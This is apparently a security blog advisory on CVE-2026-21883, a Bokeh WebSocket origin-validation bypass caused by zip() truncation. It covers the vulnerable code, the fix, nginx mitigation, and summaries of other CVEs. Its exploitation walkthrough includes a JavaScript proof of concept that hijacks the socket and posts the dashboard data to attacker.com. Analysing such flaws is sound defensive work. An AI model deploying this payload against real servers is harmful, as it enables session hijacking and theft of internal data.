Feb 26, 2026·6 min read·38 visits
Bokeh's WebSocket origin validator used Python's `zip()` function, which stops comparing when the shortest list ends. Attackers can register subdomains starting with a trusted name (e.g., `trustedsite.corp.attacker.com`) to trick the server into accepting the connection, leading to full session hijacking.
A logic error in the Bokeh interactive visualization library allows attackers to bypass WebSocket Origin validation. By exploiting Python's `zip()` function behavior, attackers can craft malicious subdomains that mimic trusted origins, enabling Cross-Site WebSocket Hijacking (CSWSH) to exfiltrate data or manipulate server-side state.
Bokeh is the darling of the Python data science world. It takes heavy, server-side computation and spits out beautiful, interactive HTML/JS visualizations. To make those sliders slide and those graphs update in real-time, Bokeh relies heavily on WebSockets. It’s a persistent pipe between the browser and the backend Python process.
But here is the thing about WebSockets: they don't adhere to the Same-Origin Policy (SOP) in the way XHR or Fetch does. A browser will happily open a WebSocket connection to any server that asks for it, carrying the user's cookies along for the ride. It is up to the server to look at the Origin header and say, "Hey, you're coming from evil.com, get lost."
If that check fails—or in this case, gets a little too lazy—you enter the realm of Cross-Site WebSocket Hijacking (CSWSH). It’s essentially CSRF on steroids. Instead of sending a single blind request (like "buy stock"), the attacker gets a full, two-way communication channel. They can read the response. They can see the data. In the context of Bokeh, that means they can watch your internal dashboard right alongside you.
The root cause of CVE-2026-21883 is a classic case of "it works for valid input, so ship it." The vulnerability lies in src/bokeh/server/util.py, specifically inside a function called match_host. This function is supposed to take the incoming Origin header and compare it against a configured allowlist.
The developers made a fatal assumption about Python's zip() function. For those uninitiated in Pythonic foot-guns, zip(a, b) takes two lists and iterates over them together. Crucially, it stops as soon as the shortest list is exhausted. It doesn't throw an error; it doesn't warn you. It just quietly packs up and goes home.
Imagine you have an allowlist containing dashboard.corp. You split that into ['dashboard', 'corp']. Now imagine an attacker comes along with dashboard.corp.evil.net. Split that, and you get ['dashboard', 'corp', 'evil', 'net']. When you zip() them, the loop runs twice. 'dashboard' matches 'dashboard'. 'corp' matches 'corp'. The loop finishes. The code hits return True. The server opens the door wide.
Let's look at the crime scene. The match_host function was trying to be clever by splitting hostnames by periods to handle subdomains and wildcards. Here is the logic that doomed it:
# The Vulnerable Logic
def match_host(host: str, pattern: str) -> bool:
host_parts = host.split('.')
pattern_parts = pattern.split('.')
# They checked if the pattern was longer than the host...
if len(pattern_parts) > len(host_parts):
return False
# ...but forgot to check if the HOST was longer than the PATTERN.
for h, p in zip(host_parts, pattern_parts):
if h == p or p == '*':
continue
else:
return False
return TrueSee the gap? If host_parts is longer than pattern_parts, zip just ignores the extra parts (the .evil.net part). The code assumes that if it survived the loop, it's a match.
The fix (Commit cedd113) is almost comically simple. It enforces that the lengths must match exactly (unless wildcards are involved, which are handled separately).
# The Fix
- if len(pattern_parts) > len(host_parts):
- return False
+ if len(pattern_parts) != len(host_parts):
+ return FalseThis one-character change (> to !=) closes the vulnerability completely. It forces the validation to acknowledge the entire hostname provided by the client.
Exploiting this requires a bit of setup, but it is highly realistic in corporate environments where internal DNS names are predictable. Let's assume a target organization runs a Bokeh server at ws://analytics.internal.corp.
Step 1: Reconnaissance
The attacker needs to know the allowlist. Often, this is the FQDN of the server itself. If the server expects analytics.internal.corp, that is our target string.
Step 2: Infrastructure
The attacker registers a domain or configures a subdomain they control to start with the target string. For example, they register attacker.com and create a subdomain: analytics.internal.corp.attacker.com.
Step 3: The Trap
The attacker hosts a simple HTML page on analytics.internal.corp.attacker.com:
<!-- Hosted on attacker's domain -->
<script>
// Browser sends Origin: http://analytics.internal.corp.attacker.com
var ws = new WebSocket("ws://analytics.internal.corp/ws");
ws.onopen = function() {
console.log("We are in.");
};
ws.onmessage = function(msg) {
// Exfiltrate sensitive dashboard data to attacker server
fetch("https://attacker.com/log", { method: "POST", body: msg.data });
};
</script>Step 4: Execution
The attacker sends the link to a victim who has access to the internal analytics dashboard. When the victim clicks, the WebSocket handshake initiates. The browser sends the attacker's domain as the Origin. The Bokeh server, blinded by the zip() flaw, sees analytics.internal.corp... and approves the connection. The attacker now receives a live feed of the victim's data.
You might think, "So what? They see a scatter plot." But Bokeh is an interactive library. The communication channel handles events. If the dashboard has widgets—buttons that trigger database refreshes, sliders that adjust parameters, or text inputs that run queries—the attacker can trigger those too.
Because WebSockets are bidirectional, the attacker can send messages to the server as if they were the user. In a worst-case scenario where the dashboard allows executing SQL queries or Python code based on input (which is bad design, but we see it constantly), this becomes Remote Code Execution (RCE) or SQL Injection via WebSocket.
Even without RCE, the confidentiality loss is massive. These dashboards often display proprietary trading data, patient health metrics, or infrastructure status. Bypassing the Origin check effectively bypasses the firewall for the application layer.
If you are running Bokeh <= 3.8.1, you are vulnerable. The primary fix is to upgrade to 3.8.2 or later immediately. The patch is small and safe to backport if you are stuck on a legacy version.
However, relying solely on application-level checks is playing with fire. You should enforce Origin validation at your ingress point—your reverse proxy.
If you use Nginx, explicit string matching is your friend:
location /ws {
proxy_pass http://backend;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
# Strict check. No regex unless necessary.
if ($http_origin !~* "^https?://(analytics\.internal\.corp)$") {
return 403;
}
}By killing the request at the Nginx layer, the vulnerable Python code never even executes. Security in depth means never trusting a zip() loop with your perimeter security.
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U| Product | Affected Versions | Fixed Version |
|---|---|---|
Bokeh Bokeh Project | <= 3.8.1 | 3.8.2 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-1385 |
| Attack Vector | Network |
| CVSS Score | 4.5 (Medium) |
| Impact | Data Exfiltration / Session Hijacking |
| Root Cause | Logic Error in List Iteration |
| Patch Status | Available (v3.8.2) |
The application does not verify or incorrectly verifies the Origin header of a WebSocket connection, allowing an attacker to establish a connection from an unauthorized origin.
A thread-safety vulnerability exists in the PyO3 library versions prior to 0.29.0 due to a missing Sync trait bound on closure type parameters. This omission allows safe Rust code to register non-thread-safe closures as Python callables, leading to concurrent shared mutation and data races during multithreaded execution.
A denial of service vulnerability in the ConnectBot SSH Client Library (cbssh) up to version 0.3.0 allows remote attackers to cause uncontrolled resource consumption. The library uses Kaitai Struct to parse incoming binary streams, but failed to validate the declared length of SSH fields against the physical stream size, leading to excessive memory allocation and OutOfMemoryError crashes.
An integer overflow and excessive memory allocation vulnerability in the Distinguished Encoding Rules (DER) private-key parser of ConnectBot SSH Client Library (connectbot/cbssh) allows a local attacker to cause a Denial of Service (DoS) via process termination. By inducing an application utilizing the library to parse a malformed DER-encoded private key file, the library attempts massive memory allocations, triggering an uncaught OutOfMemoryError on the JVM.
An unauthenticated remote code execution (RCE) vulnerability exists in phoenix_storybook versions 0.5.0 through 1.0.x due to improper input sanitization during HEEx template generation. By sending crafted WebSocket messages, an attacker can escape HTML attribute boundaries and execute arbitrary Elixir code.
An unauthenticated Denial-of-Service (DoS) vulnerability exists in phoenix_storybook versions 0.2.0 through 1.0.11 due to allocation of resources without limits (CWE-770). The application dynamically converts user-supplied parameter keys to atoms, leading to BEAM Atom Table exhaustion and immediate virtual machine crash.
A security vulnerability in the Elixir package phoenix_storybook (versions 0.4.0 up to 1.1.0) allows unauthenticated remote attackers to perform cross-session PubSub topic injection. By manipulating URL parameters, an attacker can hijack the real-time communications channel, enabling them to capture user state and control parameters from active sessions.